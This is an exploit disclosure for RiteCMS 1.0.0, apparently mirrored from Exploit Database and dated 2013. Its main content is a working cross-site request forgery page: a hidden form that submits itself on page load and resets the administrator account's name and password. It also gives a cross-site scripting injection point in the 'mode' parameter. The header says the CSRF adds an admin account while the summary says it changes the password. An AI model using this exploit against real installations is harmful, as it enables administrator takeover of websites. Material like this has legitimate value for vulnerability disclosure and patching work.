RiteCMS 1.0.0 – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： Yashar shahinzadeh
  日期： 2013-08-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27315/

• ###########################################################################################
  # Exploit Title: RiteCMS multiple vulnerabilities
  # Date: 2013 30 July
  # Exploit Author: Yashar shahinzadeh
  # Credit goes for: ha.cker.ir
  # Vendor Homepage: http://ritecms.com/
  # Tested on: Linux & Windows, PHP 5.2.9
  # Affected Version : 1.0.0
  #
  # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
  ###########################################################################################
  
  Summary:
  ========
  1. CSRF - Change administrator's password
  2. Cross site scripting
  
  1. CSRF - Adding an admin account:
  ==================================
  
  <html>
  <body onload="submitForm()">
  <form name="myForm" id="myForm"
  action="http://[Path to RiteCMS]/cms/index.php" method="post">
  <input type="hidden" name="mode" value="users">
  <input type="hidden" name="id" value="1">
  <input type="hidden" name="name" value="admin1">
  				<input type="hidden" name="new_pw" value="admin">
  				<input type="hidden" name="new_pw_r" value="admin">
  				<input type="hidden" name="type" value="1">
  				<input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
  </form>
  <script type='text/javascript'>document.myForm.submit();</script>
  </html>
  
  
  2. Cross site scripting (After auth):
  =====================================
  http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]